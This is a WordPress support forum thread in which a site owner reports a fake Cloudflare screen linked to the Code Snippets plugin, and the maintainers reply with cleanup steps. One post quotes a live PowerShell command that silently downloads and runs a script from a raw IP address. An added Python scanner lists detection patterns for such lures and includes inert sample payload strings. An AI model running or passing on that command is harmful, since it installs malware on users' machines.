Title: Virus alert on Code Snippets Plugin
Last modified: July 17, 2025

---

# Virus alert on Code Snippets Plugin

 *  Resolved [Bruno Martinez](https://wordpress.org/support/users/brmartinez/)
 * (@brmartinez)
 * [9 months, 1 week ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/)
 * Hello, I’ve recently noticed that this plugin is infected with a virus that shows
   a “fake cloudflare” screen. It instructs the user to copy and paste a code in
   the command screen (Windows CMD). [https://www.loom.com/share/2d5e34d7bb074b219bdbe2511dc5af2b?sid=0bd6a140-3177-458c-b352-5a1966916106](https://www.loom.com/share/2d5e34d7bb074b219bdbe2511dc5af2b?sid=0bd6a140-3177-458c-b352-5a1966916106)
 * Please be aware this is happening and check if you can make it more secure. I’ve
   had to remove the plugin, to fix the virus issue on my website.
 * Thanks!

Viewing 9 replies - 1 through 9 (of 9 total)

 *  [Jeff Mankini](https://wordpress.org/support/users/jeffmankini/)
 * (@jeffmankini)
 * [9 months, 1 week ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18560413)
 * Hi Bruno,
 * It looks like your site may be infected with malware. From what I can see, this
   doesn’t appear to be coming from the Code Snippets plugin itself, but rather 
   from a malicious script that’s been added somewhere on your site.
 * Do you happen to recall any of the last few snippets you may have added? That
   might help us narrow down where this could be coming from.
 * Cheers,
 * Jeff
   The Code Snippets Team
 *  Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/)
 * (@brmartinez)
 * [9 months ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18571147)
 * Hello, answering your inquiries:
    1. No, the malware script was found in your plugin. Removing your plugin removed
       the virus. We’ve tried this twice (reinstalling it opened the door for a new
       infection, so we’ve had to remove it again);
    2. No, we’re not using your plugin anymore, and since then, we haven’t had any 
       infections (it’s a pity, actually, because your plugin is really great. Congrats
       for that, by the way).
 * Here’s a list of all our snippets:
 *     ```wp-block-code
       Rank Math Rules Exclusions (PHP)
       ===============================
       /**
        * Filter to disable some tests
        */
       add_filter('rank_math/researches/tests', function ($tests, $type) {
           unset($tests['titleHasNumber']);
           unset($tests['lengthPermalink']);
           unset($tests['hasContentAI']);
           unset($tests['keywordInMetaDescription']);
           unset($tests['contentHasTOC']);
           unset($tests['keywordDensity']);
           unset($tests['keywordInSubheadings']);
           unset($tests['lengthContent']);
           return $tests;
       }, 10, 2 );

       Rank Math Filter to change the Post Meta Table Limit (PHP)
       ===============================
       /**
        * Filter to change the Post Meta Table Limit
        */
       add_filter('rank_math/seo_analysis/postmeta_table_limit', function ( $limit ) {
           return 5000000;
       });

       RankMath Clear flush sitemap cache (PHP)
       ===============================
       add_filter( 'rank_math/sitemap/enable_caching', '__return_false');

       Rank Math Filter Fast indexing API error fix (PHP)
       add_filter( 'doing_it_wrong_trigger_error', '__return_false' );

       Filter to add Locations KML file in the sitemap (PHP)
       ===============================
       /**
        * Filter to add Locations KML file in the sitemap
        */
       add_filter( 'rank_math/sitemap/locations', '__return_true' );

       Modify imagify picture tag (PHP)
       ===============================
       add_filter( 'imagify_buffer', function( $html ) {
           // Apply changes only inside <div class="cs-overlay-background"> blocks
           $html = preg_replace_callback(
               '#<div[^>]*class=["\'][^"\']*cs-overlay-background[^"\']*["\'][^>]*>(.*?)</div>#is',
               function ( $divMatches ) {
                   $divContent = $divMatches[1];
                   // Modify picture tags WITH style attribute
                   $divContent = preg_replace_callback(
                       '/<picture([^>]*?)style\s*=\s*["\']([^"\']*)["\']([^>]*)>/i',
                       function ( $matches ) {
                           $style = $matches[2];
                           if ( stripos( $style, 'height' ) === false ) {
                               $style = rtrim( $style, '; ' ) . '; height:100%;';
                           }
                           return '<picture' . $matches[1] . 'style="' . $style . '"' . $matches[3] . '>';
                       },
                       $divContent
                   );
                   // Modify picture tags WITHOUT style attribute
                   $divContent = preg_replace(
                       '/<picture(?![^>]*\bstyle=)([^>]*)>/i',
                       '<picture style="height:100%;"$1>',
                       $divContent
                   );
                   // Return modified div
                   return str_replace($divMatches[1], $divContent, $divMatches[0]);
               },
               $html
           );
           return $html;
       } );

       Mastodon Tag (HTML)
       ===============================
       <meta name="fediverse:creator" content="@Showmetech@mastodon.social">
       ```
   
 * If you need anything else, just let me know.
 * Kind regards and thanks for helping out! 🙂
 *  Plugin Author [Shea Bunge](https://wordpress.org/support/users/bungeshea/)
 * (@bungeshea)
 * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18573562)
 * Hi [@brmartinez](https://wordpress.org/support/users/brmartinez/),
 * I can confirm we don’t have anything remotely like that in the distributed plugin–
   we don’t even have anything to do with CloudFlare.
 * It’s possible that your _copy_ of the plugin became infected somehow, and if 
   so, it points to a vulnerability in your system that I’d definitely recommend
   trying to identify. Once dealt with, redownloading a fresh copy of the plugin
   from this site should resolve issues.
 *  Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/)
 * (@brmartinez)
 * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18574227)
 * By your answer, it seems you didn’t understand how the virus works: it SIMULATES
   a FAKE CloudFlare screen. So it does not relate to the official Cloudflare service
   at all, ok?
 * I’ve removed the plugin, then reinstalled it. After a few days, the virus returned.
 * In my latest test, I’ve now removed the plugin again, then deleted leftover tables
   from it, and installed it again. I’ll let you know if the virus returns.
 *  Plugin Author [Shea Bunge](https://wordpress.org/support/users/bungeshea/)
 * (@bungeshea)
 * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18574473)
 * I understand your description of what’s happening – I was suggesting the improbability
   of it being tied up with the distributed plugin code as the behaviour you describe
   is not remotely close to the plugin’s functionality.
 * Can I ask where you found the malware script in the plugin? Which source file
   etc?
 *  Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/)
 * (@brmartinez)
 * [8 months, 4 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18575913)
 * The devs at my server found it. Here’s what they’ve explained to me on July 10th:
 * “We’ve found malware on your site and the same was related to the “code-snippets”
   plugin. This malware is particularly dangerous, as it shows a fake Cloudflare screen
   that prompts the user to execute a PowerShell command that downloads and runs
   a script:
 * powershell -w h -c “$f=$env:TEMP+’\\’+[guid]::NewGuid()+’.ps1′;curl [http://185.100.157.79/wXq.dof](http://185.100.157.79/wXq.dof)-
   o $f;powershell -w h -ep Bypass -f $f”
 * Currently, the plugin is enabled, and if you disable it, the required authentication
   (fake Cloudflare page) will not be presented.”
 *  Plugin Author [Imants](https://wordpress.org/support/users/0aksmith/)
 * (@0aksmith)
 * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576473)
 * Hi [@brmartinez](https://wordpress.org/support/users/brmartinez/),
 * Thanks so much for following up and sharing the details.
   I really appreciate 
   the time you’ve taken to test and report what you’re seeing.
 * From your description, it does sound like the Code Snippets plugin may be getting
   leveraged directly, or as part of a broader exploit chain, especially given the
   flexibility it offers for running custom code. I completely understand how concerning
   this must be, and I want to reassure you that we take this seriously.
   Here are
   some steps we recommend to help secure and restore your WordPress site:
    - **Activate Code Snippets Safe Mode:**
      This pauses all snippets so you can 
      safely access your site and troubleshoot without executing custom code. See:
      [Help! My site broke! How can I fix it?](https://codesnippets.pro/doc/help-my-site-broke-how-can-i-fix-it/)
    - **Reinstall WordPress Core:**
      Replace all core WordPress files with fresh 
      copies to eliminate any hidden backdoors.
    - **Check and Clean Critical Directories:**
       * Look through the `uploads` folder for any unfamiliar files.
       * Review post content, custom fields, and database entries for hidden or 
         obfuscated scripts.
       * Inspect your `wp-config.php` file for any unauthorized changes.
    - **Audit Users and Permissions:**
       * Remove any unknown admin users.
       * Update passwords for all admin accounts, and change your database and FTP
         credentials.
    - **Update All Plugins and Themes:**
       * Remove any unused or untrusted plugins/themes.
       * Make sure everything is running the latest secure version.
    - **Restore from a Clean Backup (if available):**
      If you have a backup from 
      before the issue started, restoring it can be a great way to get back to a
      clean state.
    - **Scan for Malware and Vulnerabilities:**
      Use a trusted security plugin like
      Patchstack, Wordfence, Sucuri, or Jetpack Protect to scan your site for hacked
      files, suspicious code, or vulnerabilities.
    - **Review Recent Snippets:**
       * Disable or delete any snippets that you didn’t add or that look suspicious.
       * Look out for snippets that could allow uploads or remote code execution.
 * Also, just a quick note: when sharing examples or links, please try to remove
   or redact any direct URLs in malicious payloads, like: `http[:]//cant.click/here`
   
   This helps keep others safe from accidentally clicking on them.
 * If you ever come across a vulnerability in the plugin itself, we’d really appreciate
   it if you could contact us directly here: [https://codesnippets.pro/contact/](https://codesnippets.pro/contact/)
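
One way to carry out the "Review Recent Snippets" step above, as an added example that is not part of the original posts and not the plugin's own code: a scanner that flags snippet code containing the indicators visible in the command quoted earlier in the thread (hidden PowerShell window, execution-policy bypass, a URL on a raw IP) and also looks inside base64 string literals. It assumes snippets are already available as name/code pairs; the rule names and the sample snippets are constructed for illustration.

```python
import base64
import re

# Rule names are this example's own; patterns follow the command quoted in the thread.
RULES = {
    "powershell-hidden-window": re.compile(
        r"powershell(?:\.exe)?\b[^\n]*?\s-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "execution-policy-bypass": re.compile(r"\s-e(?:p|xecutionpolicy)\s+bypass\b", re.I),
    "clipboard-write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy", re.I),
    "eval-of-decoded-data": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "url-with-raw-ip": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")

def scan_text(text):
    return {name for name, rx in RULES.items() if rx.search(text)}

def scan_snippet(code, depth=2):
    """Return sorted rule names hit by the code, including inside base64 literals."""
    hits = scan_text(code)
    if depth > 0:
        for literal in B64_LITERAL.findall(code):
            try:
                decoded = base64.b64decode(literal, validate=True).decode("utf-8", "ignore")
            except ValueError:  # not valid base64 after all
                continue
            hits |= {f"{h} (base64)" for h in scan_snippet(decoded, depth - 1)}
    return sorted(hits)

def review(snippets):
    """Map snippet name -> rule hits, keeping only snippets that need a human look."""
    report = {s["name"]: scan_snippet(s["code"]) for s in snippets}
    return {name: hits for name, hits in report.items() if hits}

# Constructed sample data: one snippet from the thread's list and two inert test strings.
LURE = "powershell -w h -ep Bypass -f X"
SAMPLES = [
    {"name": "RankMath Clear flush sitemap cache",
     "code": "add_filter( 'rank_math/sitemap/enable_caching', '__return_false');"},
    {"name": "constructed-plain",
     "code": "<script>navigator.clipboard.writeText('" + LURE + "')</script>"},
    {"name": "constructed-encoded",
     "code": "eval(base64_decode('" + base64.b64encode(LURE.encode()).decode() + "'));"},
]

if __name__ == "__main__":
    for name, hits in review(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

A clean result only means none of these few patterns matched; any snippet nobody on the site remembers adding still deserves a manual read.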
 *  Thread Starter [Bruno Martinez](https://wordpress.org/support/users/brmartinez/)
 * (@brmartinez)
 * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576616)
 * Thanks. Can someone in your team be available to help me out with these tasks?
   I’m not a developer and I don’t have one, so I won’t be able to follow on this
   alone.
 *  Plugin Author [Imants](https://wordpress.org/support/users/0aksmith/)
 * (@0aksmith)
 * [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576648)
 * Bruno.
   Our team specializes primarily in plugin development, so when it comes
   to dealing with security issues or cleaning up malicious files, your hosting 
   provider is often best equipped to help. Given the gravity of the exploit found
   on your site, I highly recommend reaching out to professional WordPress incident
   response services as they will have the expertise and tools to help you fully
   secure, recover and protect your website.

The topic ‘Virus alert on Code Snippets Plugin’ is closed to new replies.

 * 11 replies
 * 4 participants
 * Last reply from: [Imants](https://wordpress.org/support/users/0aksmith/)
 * Last activity: [8 months, 3 weeks ago](https://wordpress.org/support/topic/virus-alert-on-code-snippets-plugin/#post-18576648)
 * Status: resolved